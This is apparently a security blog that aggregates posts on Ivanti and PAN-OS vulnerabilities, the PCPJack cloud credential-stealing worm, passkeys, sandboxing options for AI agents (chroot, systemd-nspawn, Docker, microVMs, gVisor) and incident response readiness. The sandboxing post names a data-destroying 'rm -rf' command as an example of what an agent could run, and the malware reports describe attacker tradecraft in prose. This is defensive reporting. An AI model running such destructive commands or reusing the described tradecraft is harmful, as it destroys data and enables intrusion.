Posts on Security, Cloud, DevOps, Citrix, VMware and others.
Words and views are my own and do not reflect on my companies views.
Disclaimer: some of the links on this site are affiliate links, if you click on them and make a purchase, I make a commission.
Ivanti is warning that a new security flaw impacting Endpoint Manager Mobile (EPMM) has been explored in limited attacks in the wild.
The high-severity vulnerability, CVE-2026-6973 (CVSS score: 7.2), is a case of improper input validation affecting EPMM before versions 12.6.1.1, 12.7.0.1, and 12.8.0.1.
It allows "a remotely authenticated user with administrative access to achieve remote code execution," Ivanti said in an advisory released today.
"We are aware of a very limited number of customers exploited with CVE-2026-6973. Successful exploitation requires Admin authentication. If customers followed Ivanti's recommendation in January to rotate credentials if you were exploited with CVE-2026-1281 and CVE-2026-1340, then your risk of exploitation from CVE-2026-6973 is significantly reduced."
It's currently not known who is behind the exploitation efforts, if any of those attacks were successful, and what the end goals of the attacks were.
The development has prompted the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to add the flaw to its Known Exploited Vulnerabilities (KEV) catalog, requiring Federal Civilian Executive Branch (FCEB) agencies to apply the fixes by May 10, 2026.
Also patched by Ivanti in EPMM are four other flaws -
CVE-2026-5786 (CVSS score: 8.8) - An improper access control vulnerability that allows a remote authenticated attacker to gain administrative access.
CVE-2026-5787 (CVSS score: 8.9) - An improper certificate validation vulnerability that allows a remote unauthenticated attacker to impersonate registered Sentry hosts and obtain valid CA-signed client certificates.
CVE-2026-5788 (CVSS score: 7.0) - An improper access control vulnerability that allows a remote unauthenticated attacker to invoke arbitrary methods.
CVE-2026-7821 (CVSS score: 7.4) - An improper certificate validation vulnerability that allows a remote unauthenticated attacker to enroll a device belonging to a restricted set of unenrolled devices, leading to information disclosure about the EPMM appliance and impacting the integrity of the newly enrolled device identity.
"The issues only affect the on-prem EPMM product, and are not present in Ivanti Neurons for MDM, Ivanti's cloud-based unified endpoint management solution, Ivanti EPM (a similarly named, but different product), Ivanti Sentry, or any other Ivanti products," the company said.
from The Hacker News https://ift.tt/zUFHVCv
via IFTTT
Cybersecurity researchers have disclosed details of a new credential theft framework dubbed PCPJack that targets exposed cloud infrastructure and ousts any artifacts linked to TeamPCP from the environments.
"The toolset harvests credentials from cloud, container, developer, productivity, and financial services, then exfiltrates the data through attacker-controlled infrastructure while attempting to spread to additional hosts," SentinelOne security researcher Alex Delamotte said in a report published today.
PCPJack is specifically designed to target cloud services like Docker, Kubernetes, Redis, MongoDB, RayML, and vulnerable web applications, allowing the operators to spread in a worm-like fashion, aswell as move laterally within the compromised networks.
It's assessed that the end goal of the cloud attack campaign is to generate illicit revenue for the threat actors through credential theft, fraud, spam, extortion, or resale of stolen access. The
What makes this activity notable is that it shares significant targeting overlaps with TeamPCP, a threat actor that rose to prominence late last year by exploiting known security vulnerabilities (e.g., React2Shell) and misconfigurations in cloud services to enlist the endpoints in an ever-expanding network for conducting data theft and other post-exploitation actions.
At the same time, PCPJack lacks a cryptocurrency mining component, unlike TeamPCP. While it's not known why this obvious monetization strategy was not adopted, the similarities between the two clusters indicate that PCPJack could be the work of a former member of TeamPCP who is familiar with the group's tradecraft.
The starting point of the attack is a bootstrap shell script that's used to prepare the environment – such as configuring the payload host – and download next-stage tooling, while simultaneously taking steps to infect its own infrastructure, terminate and remove processes or artifacts that are associated with TeamPCP, install Python, establish persistence, download six Python scripts, launch the orchestration script, and remove itself.
The six Python payloads are as follows -
worm.py (written to disk as monitor.py), the main orchestrator that launches the purpose-built modules, conducts local credential theft, propagates the toolset to other hosts by exploiting known flaws (CVE-2025-55182, CVE-2025-29927, CVE-2026-1357, CVE-2025-9501, and CVE-2025-48703), and uses Telegram for command-and-control (C2)
parser.py (utils.py), to handle credential extraction to categorize stolen keys and secrets
lateral.py (_lat.py), to facilitate reconnaissance, harvest secrets, and enable lateral movement across SSH, Kubernetes, Docker, Redis, RayML, and MongoDB services
crypto_util.py (_cu.py), to encrypt credentials before exfiltration to the attacker's Telegram channel
cloud_ranges.py (_cr.py), to collect IP address ranges assigned to Amazon Web Services (AWS), Google Cloud, Microsoft Azure, Cloudflare, Cloudfront, and Fastly, and refresh the data every 24 hours
cloud_scan.py (_csc.py), to run cloud port scanning for external propagation via Docker, Kubernetes, MongoDB, RayML, or Redis services
Propagation targets for the orchestrator script come from parquet files that the worm pulls directly from Common Crawl, a non-profit that crawls the web and provides its archives and datasets to the public at no extra cost.
"When exfiltrating system information and credentials, the PCPJack operator even collects success metrics on whether TeamPCP has been evicted from targeted environments in a 'PCP replaced' field sent to the C2," Delamotte said. This "implies a direct focus on the threat actor's activities rather than pure cloud attack opportunism."
Further analysis of the threat actor's infrastructure has uncovered another shell script ("check.sh") that detects the CPU architecture and fetches the appropriate Sliver binary. It also scans Instance Metadata Service (IMDS) endpoints, Kubernetes service accounts, and Docker instances for credentials associated with Anthropic, Digital Ocean, Discord, Google API, Grafana Cloud, HashiCorp Vault, OnePassword, and OpenAI, and transmits them to an external server.
"Overall, the two toolsets are well developed and indicate that the owner values making code as a modular framework, despite some redundancies in behavior," SentinelOne said. "This campaign does not [deploy miners], and it deliberately removes the miner functions associated with TeamPCP. Despite that, this actor has well-defined scopes for extracting cryptocurrency credentials."
from The Hacker News https://ift.tt/xrg4FQA
via IFTTT
World Passkey Day is a chance to reflect on progress toward a shared goal: reducing our reliance on passwords and other phishable authentication methods by accelerating passkey adoption. As cyberattacks become more automated and AI-powered, each account is only as secure as its weakest credential. Real progress requires more than adding stronger sign-in options—it requires removing phishable credentials and strengthening common attack paths like recovery flows. In partnership with the FIDO Alliance, Microsoft is committed to advancing passkey adoption through ongoing standards work, active participation in working groups, and other contributions to a passwordless future.
Passwords remain a major source of risk; they’re difficult to manage and easy to steal. Along with weaker forms of multifactor authentication, they’re also highly vulnerable to phishing: AI-powered campaigns drive click-through rates as high as 54%.1 In response, Microsoft is expanding passkey adoption across our ecosystem. We’re reducing reliance on legacy authentication and strengthening account recovery so it won’t become a backdoor for cyberattackers.
“Instead of vulnerable secrets or potentially identifiable personal information, a passkey uses a private key stored safely on the user’s device. It only works on the website or app for which the user created it, and only if that same user unlocks it with their biometrics or PIN. This means passkey users can’t be tricked into signing in to a malicious lookalike website, and a passkey is unusable unless the user is present and consenting. These are some qualities that make passkeys a ‘phishing-resistant’ form of authentication.”
Passkey adoption is accelerating: FIDO Alliance estimates 5 billion passkeys already in use worldwide.2 Across Microsoft’s consumer services, including OneDrive, Xbox, and Copilot, hundreds of millions of users sign in with passkeys every day.
There are many reasons to choose passkeys as the standard authentication method over passwords. Sign-in success rates are significantly higher than with passwords, and exposure to credential-based attacks is significantly lower.3 Organizations and individual users alike prefer the simpler, more secure sign-in experience passkeys offer.4
Inside Microsoft, we’ve eliminated weaker authentication methods and rolled out phishing-resistant authentication, covering 99.6% of users and devices in our environment.5 It’s made signing in a lot simpler: no codes to enter, no extra prompts to manage, just a straightforward experience for everyone.
Product updates across sign-in and recovery
Across Microsoft, we’ve been steadily building passkey support into every layer of the identity experience from consumer accounts to enterprise access with Microsoft Entra, and from device-based authentication like Windows Hello to Microsoft’s password manager. This work ensures people can create and use passkeys wherever they sign in, with a consistent, phishing-resistant experience across devices, apps, and environments.
To make passkeys more accessible, we’re expanding where and how people can use them:
Synced passkeys and passkey profiles in Microsoft Entra ID make it easier to scale passwordless sign-in across diverse environments. We’re expanding flexibility in cloud passkey management, including support for larger and more complex policies, and transitioning tenants to a unified passkey profile model.
Entra passkeys on Windows make it simple for users to create and use device-bound passkeys directly on personal or unmanaged Windows devices using Windows Hello, and will be generally available in late May 2026.
Passkeys for Microsoft Entra External ID will be generally available late May 2026, so your customer-facing applications can offer a more seamless, consumer-grade sign-in experience.
Passkey-preferred authentication in Microsoft Entra ID (preview) detects registered methods and prompts the strongest one first. If a passkey is registered, that’s what the user sees—immediately.
On the consumer side, with Microsoft Password Manager, users can now save and sync passkeys across devices signed in with their Microsoft account, with support for iOS and Android rolling out soon through Microsoft Edge.
Account recovery also plays a critical role in maintaining the integrity of identity systems. Historically, it’s been vulnerable to cyberattackers who try to hijack the recovery process, for example by impersonating legitimate users and requesting new credentials.
Microsoft Entra ID account recovery, generally available today, strengthens security for recovery flows by enabling users to regain access to their accounts through a robust identity verification process. Users can regain access after losing all authentication methods by using government-issued ID and biometric face checks. At general availability, we are expanding our identity verification ecosystem with two new partners—1Kosmos and CLEAR1—joining our existing partners Au10tix, IDEMIA, and TrueCredential.
Removing phishable credentials from user accounts
Strengthening authentication is important, but reducing risk means eliminating phishable credentials entirely. Microsoft is continuing to phase out legacy methods and move users toward phishing-resistant authentication. Starting in January 2027, security questions will be removed as a password reset option in Microsoft Entra ID due to their susceptibility to guessing and social engineering.
The rationale is straightforward: improving strong methods while removing weak ones shrinks the attack surface. This is increasingly urgent as AI agents act on behalf of users. If an identity is compromised, cyberattackers can leverage those agents to access systems, execute workflows, and operate within existing permissions. Organizations need to address this risk quickly.
A more secure and usable future
Last year, Microsoft joined dozens of organizations in taking the Passkey Pledge, a commitment to accelerating the adoption of phishing-resistant authentication and to moving beyond passwords. Since then, we’ve seen meaningful progress, from hundreds of millions of better-protected consumer accounts to large-scale deployments across organizations like our own.
What once felt like a long-term shift is finally gaining real momentum: authentication is becoming simpler, safer, and passwordless.
For a more in-depth perspective on how cyberattackers try to bypass authentication through fallback methods and recovery flows—and how to address those gaps—read our companion post.
Getting started
Organizations that want to strengthen their identity security posture can enable passkeys for their users and extend policy protections across both sign-in and recovery scenarios.
To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.
The hardest part of cybersecurity isn't the technology, it’s the people.
Every major breach you’ve read about lately usually starts the same way: one employee, one clever email, and one "Patient Zero" infection.
In 2026, hackers are using AI to make these "first clicks" nearly impossible to spot. If a single laptop gets compromised on your watch, do you have a plan to stop it from taking down the whole company?
What is "Patient Zero"?
In medicine, Patient Zero is the first person to carry a disease into a population. In cybersecurity, it’s the first device an attacker hits. Once they are "in," they don't stay there—they move fast to find your data, your passwords, and your backups.
What You Will Learn
Thisisn't a boring lecture. It is a technical deep dive into how modern breaches start and how to kill them instantly. We are covering:
The AI Phish: How attackers use generative AI to bypass your current filters.
The 5-Minute Window: Why the first few minutes of an infection determine if you'll be in the news tomorrow.
Zero Trust in Action: How to isolate an infected device so the "virus" has nowhere to go.
The Recovery Blueprint: What to do the second you realize you have a Patient Zero.
Why You Can’t Miss This
Most security tools are great at finding "known" viruses. But they struggle with stealthy, custom-made attacks designed specifically for your company.
This webinar shows you how to build a defense that assumes someone will click a bad link—and ensures that click doesn't cost you millions.
Found this article interesting? This article is a contributed piece from one of our valued partners. Follow us on Google News, Twitter and LinkedIn to read more exclusive content we post.
from The Hacker News https://ift.tt/nCpV47W
via IFTTT
Palo Alto Networks has disclosed that threat actors may have attempted to unsuccessfully exploit a recently disclosed critical security flaw as early as April 9, 2026.
The vulnerability in question is CVE-2026-0300 (CVSS score: 9.3/8.7), a buffer overflow vulnerability in the User-ID Authentication Portal service of Palo Alto Networks PAN-OS software that could allow an unauthenticated attacker to execute arbitrary code with root privileges by sending specially crafted packets.
While fixes are expected to be released starting May 13, 2026, customers are advised to secure access to the PAN-OS User-ID Authentication Portal by restricting access to trusted zones, or by disabling it entirely if it's not used.
In an advisory issued Wednesday, the network security company said it's aware of limited exploitation of the flaw. It's tracking the activity under the CL-STA-1132, a suspected state-sponsored threat cluster of unknown provenance.
"The attacker behind this activity exploited CVE-2026-0300 to achieve unauthenticated remote code execution (RCE) in PAN-OS software. Upon successful exploitation, the attacker was able to inject shellcode into an nginx worker process," Palo Alto Networks Unit 42 said.
The cybersecurity company said it has observed unsuccessful exploitation attempts against a PAN-OS device starting April 9, 2026, a week after which the attackers managed to successfully obtain remote code execution against the appliance and inject shellcode.
As soon as initial access was achieved, the threat actors took steps to clear crash kernel messages, delete nginx crash entries and nginx crash records, and remove crash core dump files in an attempt to cover up the tracks.
Post-exploitation activities conducted by the adversary included conducting Active Directory (AD) enumeration and dropping additional payloads like EarthWorm and ReverseSocks5 against a second device on April 29, 2026. Both tools have been previously used by various China-nexus hacking groups.
"Over the last five years, nation-state threat actors engaged in cyber espionage have increasingly focused their efforts on edge-network technological assets, including firewalls, routers, IoT devices, hypervisors and various VPN solutions, which provide high-privilege access while often lacking the robust logging and security agents found on standard endpoints," Unit 42 said.
"The reliance of the attackers behind CL-STA-1132 on open-source tooling, rather than proprietary malware, minimized signature-based detection and facilitated seamless environment integration. This technical choice, combined with a disciplined operational cadence of intermittent interactive sessions over a multi-week period, intentionally remained below the behavioral thresholds of most automated alerting systems."
from The Hacker News https://ift.tt/gV3W7su
via IFTTT
Meanwhile in userland, most knowledge workers are still just using AI as a fancy answer engine.
When I talk to customers, it seems all I hear about are stalled pilots, Copilot deployments that don’t meet expectations, and feelings that agent demos from conferences don’t translate to anything close to what a company could actually run in production. (I love this 18-minute segment from The Artificial Intelligence Show podcast on this topic.)
The problem isn’t about agents, per se. It’s that most people view agents as the ultimate goal of AI, and now that agents are becoming real(ish), people want to jump right to them even though they haven’t taken the intermediate steps to get there.
I’ve written over and over that agents need to be viewed like human workers, rather than software tools. After all, in order to be successful, agents need the same things as humans: context, guidance on judgement, understanding of the established way of working, etc. (Deploying an agent without this is like handing a new hire a laptop & login and saying, “Now go do my job.”) AI agents without this fail for the same reasons a human would.
Crawl … Run! (Wait, did we skip “walk”?)
You know that phrase, “crawl, walk, run.” It can apply to AI in the enterprise too. Crawl is using AI via a chat interface. (Where most are today). Run is having AI agents do useful work throughout the company. (What everyone is talking about now.) So what happened to walking?
Walking is where you teach AI how you actually work, what context matters, and what good looks like. It’s where you build skills, capture how decisions get made, and give AI memory that persists between sessions. (I laid the full version of this progression in my 7-stage roadmap for human-AI collaboration. Each stage builds on the one before it, and you can’t skip steps.)
You can’t skip steps!!
What does walking look like?
I use the cognitive stack to illustrate how AI is entering the knowledge workplace. Worker interaction with AI is at the top. Context, skills, and judgment are in the middle. Agents are at the bottom.
Everyone understands the top part, since human workers telling AI what they want to do is how most of us have been using AI for years. And everyone understands the bottom part (even if only in fantasy) where AI agents go into the real world and do real work. But how do you connect those two together? That’s the walking part.
I argue that the reason people are having challenges with agents in the workplace is because they’re skipping from crawl to run. In other words, they tell AI what they want (crawl), and they’ve empowered AI with logins and agency and tools (run), but they haven’t given AI the skills or context (walk).
At this point you’re probably thinking that I’ll spend the rest of this post explaining why the walking step is important. But no! I mean, yes, walking is important. But also:
Even after you learn how to run, you still mostly walk everywhere
Just because can see a “run” future where AI agents do all sorts of real work, remember that most people spend more time crawling and walking than they do running. Sure, running is fastest, but it’s also tiring, you get sweaty, and it’s easier to fall.
Successfully leveraging AI in the enterprise is going to be about applying the right approach to each task. Let’s say you need to analyze some data. (A spreadsheet, customer list… whatever.) You can do that analysis at any layer of the stack. So which layer do you choose? (Remembering that each layer down costs more than the one above it while also requiring the layers above it.)
The easiest and simplest (crawl) is you just do it yourself. You open Excel, paste in the data, and write some formulas. There’s no AI involved. It’s cheap (no tokens), fast, and reliable because you’re the one doing it.
One layer deeper, you paste the data into your LLM and have AI reason over it in the context window. Maybe that costs 1,000 tokens. The more context you give the AI, the better chance you have of getting the results you want.
Deeper still, you can use a skill, (maybe a Python script you built once and reuse). The cost per run isn’t going to be any more than in-context reasoning, though this one has a dependency: the skill had to be built with context and judgment, and it has to be maintained. And it required the layers above it.
Finally, you could go all the way down to “run” and have a computer using agent do it, where AI operates Excel like a human would, pasting in the data, clicking cells, writing formulas, and doing the whole thing autonomously. It might cost 200,000 tokens, it’s slower, and it’s more likely to make mistakes. (But hey, you’re “running” with an agent!) But using an agent here only works if it has the context, skills, and judgment from the layers above to know what “good” looks like. Without those layers, you’ll spend 200,000 tokens to do something the layers above could’ve done for 1,000, or for free by just opening Excel yourself.
Don’t focus on agents before you’ve solidified the layers in between
Once you’ve built out all the layers of your cognitive stack, agents stop being the only destination, instead becoming just one of many approaches in your AI arsenal, (alongside in-context reasoning, skills, and just doing things yourself). The future of AI in the enterprise isn’t about racing to deploy agents. It’s balancing the right effort, the right tool, and the right type of token for each task.
The companies who figure this out will “run” circles around the ones racing straight to agents. They’ll spend a fraction of the tokens, deliver higher quality work, and reach for an agents only when actually warranted. The ones racing straight to agents will burn tokens, dollars, and effort wondering why their pilots stalled.
Crawl before you walk. Walk before you run. Run fast when you need to, but never forget how to walk and crawl.
“AI agents will become the primary way we interact with computers in the future. They will be able to understand our needs and preferences, and proactively help us with tasks and decision making.“
Satya Nadella
CEO of Microsoft
Whether you are a software engineer, a product manager, or a designer, this quote should fundamentally change how we approach our daily routine. We are no longer just building interfaces; we are creating environments where agents can operate autonomously with minimal human interaction. What could be the fundamental requirement for such an environment ?
In a single word: Isolation.
A user interacting with traditional software is constrained by the actions it allows. But Agents are non-deterministic, and therefore prone to hallucination and prompt injections. Once you give an AI write access to your systems, there is nothing stopping it from executing a rm -rf to delete all your data. Of course, there are different ways to solve this problem, with one approach being sandboxing: an isolated, controlled environment used for experimentation and testing without affecting the surrounding system.
So, I started exploring different strategies to sandbox the agents. Starting with a bare minimum setup and going all the way to setting up a cloud VM. Here is what I learned at each step.
1. Let’s Start with the Baseline
Chroot has been the traditional way to achieve file system isolation. It works well when you want the process to think that a specific, restricted directory is the absolute root of the machine.
However, there are two major caveats.
If the process inside the chroot has root privileges, it could break out.
While it offers file isolation, process isolation is still a problem. A malicious agent can still see other processes running on your system and try to kill them.
As you can see above, doing an ls /proc still shows all the processes running on the host.
This is when I learnt about systemd-nspawn, also called “chroot on steroids”. The difference between chroot and systemd-spawn is that the latter provides isolation at the network and process levels in addition to the file system.
Now, when I do the same ls /proc in the systemd-nspawn mybox container, I just see the processes in the mybox container achieving process-level isolation.
Pros
Lightweight compared to other container processes like Docker, it offers faster startup times.
Native support in Linux.
Caveats
systemd-nspawn is not very popular in the developer community unless you are deep into Linux.
While this works for Linux, what if you need to run your agents on Windows? You will have to find alternatives depending on the platform.
2. Are Containers Enough?
Another technology that comes to mind when thinking about isolated environments is Docker. And unlike the previous concepts we discussed, Docker has a broader ecosystem and a strong community.
With containers, you also get isolated file systems, network interfaces, and process trees. They also come with cross-platform support across Mac, Windows, and Linux. With all these advantages, creating and running agents across different platforms becomes very easy, which makes containers an obvious choice.
However, the model becomes more complex when containers become a dev platform for agents. More often than not, agents need to execute generated code in separate environments, which in practice means spinning up new Docker containers on demand. This introduces a container-in-container pattern (Docker-in-Docker), where an agent running inside a container needs to build and run other containers.
To make Docker-in-Docker to work, we would have to run the container in privileged mode (--privileged), which gives the container processes elevated permissions rights and dramatically weakens the isolation. At this point, the isolation guarantees are significantly diminished. As a result, complete isolation for agents using only containers becomes tricky.
3. Do Virtual Machines Help?
As you might have already predicted, Virtual Machines (VMs) offer the strongest isolation. With a VM, you can get an entire OS, file system, and network of your own. For example, I currently run MacOS with lima – Linux VM to run Linux-specific workloads.
However, the tradeoff is that spinning up a VM is expensive. And if this needs to be done for every agent, it is not scalable. Some stats that show how expensive spinning up a VM with system-nspawn looks like.
Approach
Per Agent Cost
Boot Time
10 Agents
VM (Lima)
~4GB RAM + 4 CPU
30-60s
~40GB RAM
systemd-nspawn
~10MB RAM
< 1s
~100MB RAM
chroot
1MB RAM
instant
~10MB RAM
For example, in the below screenshot you can see the cost it takes to run a lima vm.
4. MicroVMs to the rescue
A MicroVM (Micro Virtual Machines) felt like the perfect answer to the isolation story. So what is MicroVM, and what makes it better?
MicroVM is a lightweight virtualisation technology that provides the strong security and isolation of a traditional VM, along with the speed of a container.
Strong security and isolation are enabled because a MicroVM gets its own kernel, aka the Guest Kernel, unlike containers, which use a shared kernel. Because of this, any compromise inside the Guest OS does not directly affect the host or the other VMs.
Speed: unlike traditional VMs, it is provisioned with minimal hardware (no USB or PCI buses) and bypasses BIOS/UEFI boot, significantly reducing device emulation overhead and startup latency.
Amazon open-sourced Firecracker in 2018, which was the earliest adoption of the MicroVM architecture. While this helped catalyze the MicroVM architecture, Firecracker was restricted to Linux environments. And most of the agentic orchestration tends to happen on developers’ laptops which run MacOS and Windows as well.
Docker addressed this gap with its Sandbox offering. The best part is their MicroVM-based architecture, which runs natively across macOS, Windows, and Linux, delivering better isolation, faster startup times, and a smoother developer experience. We will learn about this in a bit.
5. gVisor
gVisor takes a unique approach to solving the isolation problem. While the previous strategies used the OS Kernel, gVisor creates its own Kernel called the “application kernel” running in the user space.
When a standard containerized app wants to do something like open a file, allocate memory, or send network traffic, it makes a “system call” (syscall) directly to the host’s Linux kernel.
With gVisor, your app is bundled with a component called the Sentry.
The Sentry intercepts every single syscall your application makes.
It processes that request in user-space using its own implementation of Linux networking, file systems, and memory management.
If the Sentry absolutely needs the host kernel to do something (like actual disk I/O), it translates the request into an extremely restricted, heavily filtered, safe call to the host.
However, it suffers from the same problem as systemd-nspawn. Not much broader community supports and only supports Linux.
Docker Sandbox
With Docker Sandboxes, AI coding agents run in isolated microVM environments. The performance is as seamless as it can be, identical to running on the host, but with significantly stronger isolation and security.This means you can run your autonomous agents without worrying about host compromise or unintended access to your local environment.
Sandbox achieves this levels of security through three layers of isolation:
Hypervisor Isolation: Every Sandbox has its own Linux Kernel. So, anything that affects the sandbox kernel will not affect the host or other sandbox kernels.
Network Isolation
Each Sandbox has its own isolated network. Meaning multiple sandboxes cannot communicate with each other or with the host.
In addition, network policies can be enforced to allow or disallow traffic from a source.
Docker Engine Isolation
This is what made me fall in love with this new architecture. Every Sandbox gets its own Docker Engine. As a result, whenever the agent runs docker pull or docker compose, those commands are executed against the internal engine rather than the external Docker daemon.
Because of this, agents running inside can only see Docker services within their sandbox and nothing else, adding an additional layer of security.
Attribute
Traditional VM
Container
Docker MicroVM
Isolation
Strong (dedicated kernel)
Weak (shared kernel)
Strong (dedicated kernel)
Boot time
Minutes
Milliseconds
Seconds (after the first image pull)
Attack Surface
Large
Medium
Minimal
To demonstrate Docker Engine isolation, I created two Sandbox sessions, ran the Docker hello-world container image in one, and then ran docker ps -a in both.
As you can see from the screenshot below, one session has the hello-world container and the other does not. This is possible because both of them are running two different Docker engine daemons.
If there is one takeaway; it’s this: isolation plays a major role when building autonomous AI agents because the blast radius of a security mistake is significant.
Each approach we explored till now solves a different piece of the isolation puzzle. Containers improve portability and developer experience, but inherit the risks of a shared kernel. Virtual Machines deliver strong isolation, but the overhead doesn’t scale when you’re spinning up dozens of agents. gVisor sits in an interesting middle ground, though compatibility and community trade offs might slow you down.
Among all these, what makes Docker Sandbox with MicroVMs compelling is how it unifies these dimensions: VM-level security, container-like startup speed, and a workflow developers already know. Per-sandbox Docker Engines and strict network boundaries make it a strong foundation for running untrusted, autonomous workloads at scale.
So, what are you waiting for? Go ahead and try it out today.
Having an incident response retainer, or even a pre-approved external incident response firm, is not the same as being ready for an incident. A retainer means someone will answer the phone. Operational readiness determines whether that team can do meaningful work the moment they do.
That distinction matters far more than many organizations realize. In the first hours of a security incident, attackers are not waiting for your identity team to provision emergency accounts, for legal to decide whether an outside firm can access sensitive systems, or for someone to figure out who owns the EDR console. Every delay gives the attacker more uninterrupted time in your environment. Every hour lost to logistics increases the likelihood of deeper compromise, broader impact, and more expensive recovery.
The same is true internally. An organization may have an incident response plan, a capable security team, and a list of escalation contacts, yet still be unprepared to respond under pressure. Readiness is not measured by what exists on paper. It is measured by how quickly responders, internal or external, can gain visibility, understand what the attacker has already touched, and make informed decisions.
On Day Zero, responders are not asking for unlimited control. They are asking for visibility first and authority second. Without visibility, containment decisions are made blindly, timelines cannot be reconstructed, and the true scope of the compromise remains unknown while the response team debates access and approvals.
This guide outlines what responders need on Day Zero, where organizations most often fall short, and how to ensure your internal team and external IR partner can begin effective work immediately when an incident is declared.
What determines response speed
Whether the first responders are internal security staff, an external retainer firm, or both working in parallel, they need access to the same core systems. Internal teams may already have some of that access. External responders usually do not unless it has been prepared in advance.
Not all access is equally urgent. Identity comes first, because identity reveals the blast radius. It shows how the attacker got in, which credentials are compromised, how privilege may have changed, and where the attacker is likely to move next. Cloud, endpoint, and logging access are all critical, but without identity visibility, responders are building a timeline on guesswork.
Identity and authentication access
Modern attacks run on identity. Stolen credentials, abused tokens, misconfigured privileges, and compromised sessions are now central to how attackers gain persistence and move laterally. If responders cannot see identity activity, they cannot explain the initial compromise, trace privilege escalation, or identify which accounts are already unsafe to trust.
For external IR firms, identity access is often the first major bottleneck. Organizations delay access while teams debate permissions, search for the right administrator, or attempt to create accounts during the incident itself. During that delay, responders are effectively blind to the attacker’s movement.
On Day Zero, responders need read and investigative access to the identity provider, directory services, SSO platforms, and federation layers. They need visibility into authentication logs, MFA events, token issuance, session activity, privileged accounts, service accounts, and recent permission changes. They also need a defined path for urgent actions such as credential resets, token invalidation, or temporary restrictions on privileged users.
Cloud and SaaS access
In cloud environments, attacker activity often looks normal unless responders can see it in context. It may appear as API calls, configuration changes, new role assignments, service account abuse, or use of legitimate automation. Without immediate access, critical evidence may disappear before it is reviewed.
On Day Zero, responders need read access to relevant cloud accounts, subscriptions, and SaaS platforms. They need visibility into audit logs, control plane activity, IAM and RBAC configurations, compute workloads, storage access patterns, serverless functions, service accounts, and secrets management. Delays in cloud access are especially damaging because some telemetry is ephemeral. If it is not captured quickly, it may be gone permanently.
Endpoint and EDR access
Endpoint telemetry often provides the clearest picture of attacker behavior, especially in the early stages of an investigation. Process execution, command-line activity, credential dumping, persistence mechanisms, and lateral movement frequently show up first in the EDR.
Without direct access, responders are forced to rely on screenshots, summaries, or findings relayed through internal teams who are already under pressure. That is not a serious investigation. It is a game of telephone during a crisis.
On Day Zero, responders need investigator-level access to EDR tools, visibility into process and network activity, the ability to query historical telemetry across hosts, and the authority to isolate systems or initiate containment when needed. If those permissions are not ready in advance, valuable time is lost, and the risk of misunderstanding grows.
Logging and monitoring access
Logs are how responders reconstruct the full story of an attack, not just what happened after detection, but what happened before it. Too often, organizations discover that their retention periods are designed for compliance or cost efficiency rather than investigation.
Fourteen days of retention is common. Ninety days should be the minimum baseline. If an attacker has been active for six weeks before detection, a 14-day window means the initial access event, early reconnaissance, and much of the lateral movement may already be gone.
Responders need access to centralized SIEM or log aggregation tools, firewall and IDS/IPS logs, VPN and remote access logs, email security logs, cloud and SaaS audit trails across all relevant tenants. If those logs are incomplete, siloed, or overwritten, responders are forced to make high-stakes decisions with partial evidence.
Access must be real, not theoretical
Access is only useful if it can be activated immediately. If access depends on a chain of approvals, manual setup, or first-time configuration, it will fail when the pressure is highest.
Operational readiness means required accounts already exist across identity, cloud, EDR, and logging systems. MFA enrollment must already be completed. Permissions must already be approved and mapped to responder roles. The team responsible for enabling access must know exactly how to do it and must have practiced the procedure before.
On Day Zero, access should function like a switch: predefined, controlled, and fast to activate. Anything else is a delay, and in incident response, delay always benefits the attacker.
Communication under breach conditions
Access problems receive the most attention in readiness discussions, but communication failures are just as damaging. Even with perfect technical visibility, an incident response breaks down quickly if teams cannot coordinate, make decisions, and share sensitive information securely.
Assume normal channels may be compromised
During an active breach, organizations should assume that email, chat platforms, and internal collaboration tools may no longer be private. If the attacker has access to those systems, then discussions about containment, investigative findings, and next steps may also be visible.
That applies to internal conversations and communication with an external IR firm. Sharing credentials, containment plans, or investigative conclusions over a compromised channel can give the attacker visibility into your response in real time.
Establish out-of-band communication
Every organization needs an out-of-band communication method that is separate from corporate identity, production email, and the internal network. This could be a dedicated secure messaging platform, a preconfigured encrypted group, or a structured phone-based process. The specific tool matters less than the requirements.
The channel must be independent of the compromised environment. It must include internal responders and external retainer contacts. It must support secure sharing of sensitive information. Most importantly, it must be tested. A communication channel that has never been used is not a response plan. It is an experiment being conducted in the middle of a crisis.
Designate an incident manager
Every response needs a single point of coordination. This is not necessarily the most senior person in the room. It is the person with the clearest operational ownership and the authority to keep the response aligned.
The incident manager coordinates activity across security, IT, legal, leadership, and external responders. They control information flow, maintain a consistent picture of scope and status, and serve as the primary interface to the IR firm. Without that role, organizations drift into fragmented communication, conflicting instructions, and slow decision-making.
Define stakeholder notification paths
Who gets notified, when, and by whom should never become a live debate during an incident. Notification tiers need to be defined in advance. Internal escalation thresholds, executive updates, legal and regulatory decision-making, customer communications, and external messaging all need clear ownership.
Organizations should also define exactly what information is shared with the IR firm on initial contact, who acts as the consistent liaison, and how updates are handled. Poor communication is not just inconvenient. It measurably slows containment and increases damage.
Building a pre-approved IR access policy
A pre-approved incident response access policy exists to eliminate decision-making overhead at the worst possible moment. When an incident is declared, the question of who can access what should already be answered.
What the policy should define
The most common failure in IR access policies is vagueness. A statement such as “responders will be granted appropriate access upon incident declaration” is not an operational policy. It is a placeholder that guarantees confusion later.
An effective policy should clearly define who can declare an incident and trigger emergency procedures. This should not require a full executive chain. A CISO, security leader, or designated on-call authority should be empowered to make that call.
It should define who can approve temporary access for external responders without reopening procurement, legal review, or vendor onboarding. Those controls matter, but they are not built for incident timelines unless pre-cleared.
It should specify the scope of access by responder role, such as IR investigator or IR lead, rather than negotiating permissions during a live event. It should also define time-boxed access, with a clear review and revocation cadence, and designate who is responsible for removing access once the incident stabilizes.
Finally, it should require post-incident cleanup, access validation, and governance review. Governance should catch up after stabilization, not slow down the first hours of investigation.
Pre-created accounts and tested workflows
Policy is only as good as the workflows behind it. If the accounts do not exist, the permissions have not been validated, or the identity team has never enabled them under realistic conditions, then the organization does not have a capability. It has documentation.
Dormant IR accounts should be created in advance across the identity provider, EDR, SIEM, and cloud tenants. They should be disabled by default, with a documented and tested enable procedure. MFA enrollment should already be complete. Hardware tokens or secure authentication workflows should be assigned before an incident occurs.
Role assignments should also be pre-approved. Enabling emergency access should be a single action, not the beginning of a conversation.
Background checks and legal friction
Background checks are a common friction point, especially in regulated sectors. The issue is not whether checks are appropriate. It is when they are enforced.
